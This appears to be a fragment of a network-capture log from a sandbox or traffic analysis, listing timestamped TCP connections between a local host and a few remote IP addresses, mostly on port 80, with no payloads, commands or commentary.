                                                                                                                                                                                                            Nov 21, 2024 15:17:37.264601946 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.265268087 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.265312910 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.265381098 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.265961885 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.266001940 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.266069889 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.266699076 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.266732931 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.266751051 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.267491102 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.267530918 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.267570972 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.268143892 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.268217087 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.268259048 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.268865108 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.268908024 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.268954992 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.269606113 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.269649029 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.269715071 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.270334005 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.270437002 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.270446062 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.271058083 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.271121025 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.271181107 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.271799088 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.271893978 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.271934032 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.272511005 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.272557020 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.272609949 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.273250103 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.273340940 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.273391962 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.273982048 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.274034023 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.274065971 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.274678946 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.274718046 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.274741888 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.275427103 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.275528908 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.275577068 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.276169062 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.276217937 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.276292086 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.276899099 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.276951075 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.276997089 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.277645111 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.277692080 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.277718067 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.278335094 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.278374910 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.278430939 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.279077053 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.279166937 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.279201984 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.279830933 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.279887915 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.279942036 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.280527115 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.280575037 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.280630112 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.281299114 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.281333923 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.281343937 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.282062054 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.282085896 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.282113075 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.282723904 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.282771111 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.282792091 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.283459902 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.283502102 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.283590078 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.284257889 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.284280062 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.284303904 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.284888983 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.284934044 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.285007000 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.285629988 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.285691023 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.285717964 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.286334991 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.286484957 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.286534071 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.287067890 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.287102938 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.287164927 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.287826061 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.287904024 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.287905931 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.288528919 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.288578987 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.288645029 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.289244890 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.289294958 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.289361000 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.289973974 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.290004015 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.290054083 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.290723085 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.290771961 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.290827990 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.291441917 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.291502953 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.291505098 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.292187929 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.292232037 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.292253971 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.294936895 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.343849897 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.344281912 CET49789443192.168.2.640.113.110.67
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.344325066 CET4434978940.113.110.67192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.344614029 CET49789443192.168.2.640.113.110.67
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.345237970 CET49789443192.168.2.640.113.110.67
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.345251083 CET4434978940.113.110.67192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.390106916 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.423116922 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.423228979 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.423321962 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.423491001 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.423542023 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.423599958 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.424186945 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.424276114 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.424335003 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.424907923 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.425045013 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.425101995 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.425683975 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.425765991 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.425810099 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.426374912 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.426470041 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.426603079 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.427095890 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.427210093 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.427380085 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.427885056 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.427962065 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.428006887 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.428575993 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.428725004 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.428782940 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.429292917 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.429405928 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.429553986 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.430043936 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.430156946 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.430243969 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.430752039 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.430871964 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.430915117 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.431459904 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.431588888 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.431809902 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.432241917 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.432436943 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.432506084 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.432933092 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.433142900 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.433187962 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.433727980 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.433832884 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.434247017 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.434370041 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.434482098 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.434521914 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.435134888 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.435245991 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.435292006 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.435830116 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.435926914 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.435971022 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.436567068 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.436732054 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.436851025 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.437720060 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.437824965 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.437980890 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.438036919 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.438174963 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.438215971 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.438783884 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.438911915 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.438956976 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.439524889 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.439863920 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.439929962 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.439960003 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.440567970 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.440613031 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.440689087 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.441395044 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.441447020 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.441488028 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.442181110 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.442209005 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.442239046 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.442821980 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.442869902 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.442950010 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.443512917 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.443566084 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.443600893 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.444247007 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.444293976 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.444295883 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.444943905 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.445050955 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.445106983 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.445677996 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.445755959 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.445785046 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.446451902 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.446501017 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.446510077 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.447217941 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.447278976 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.447295904 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.447844982 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.447890997 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.447925091 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.448586941 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.448632956 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.448668957 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.449321032 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.449364901 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.449409008 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.450045109 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.450131893 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.450170994 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.450799942 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.450858116 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.450983047 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.451504946 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.451546907 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.451616049 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.452223063 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.452275038 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.452332973 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.452976942 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.453031063 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.453108072 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.453692913 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.453763008 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.453819036 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.454425097 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.454514027 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.454559088 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.455166101 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.455204964 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.455291986 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.455852985 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.455955982 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.456006050 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.456607103 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.456643105 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.456701040 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.457314014 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.457421064 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.457499981 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.458062887 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.458126068 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.458156109 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.458791018 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.458920956 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.458967924 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.459510088 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.459554911 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.459563017 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.460256100 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.460304022 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.460413933 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.460977077 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.461447001 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.476775885 CET4434978413.107.246.45192.168.2.6
